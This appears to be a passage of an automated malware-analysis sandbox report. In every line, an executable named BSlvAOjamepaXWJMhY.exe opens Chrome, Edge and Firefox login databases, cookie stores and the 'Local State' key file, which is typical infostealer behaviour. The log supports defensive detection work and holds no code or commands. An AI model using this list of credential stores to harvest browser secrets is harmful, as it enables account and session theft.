Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Web Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
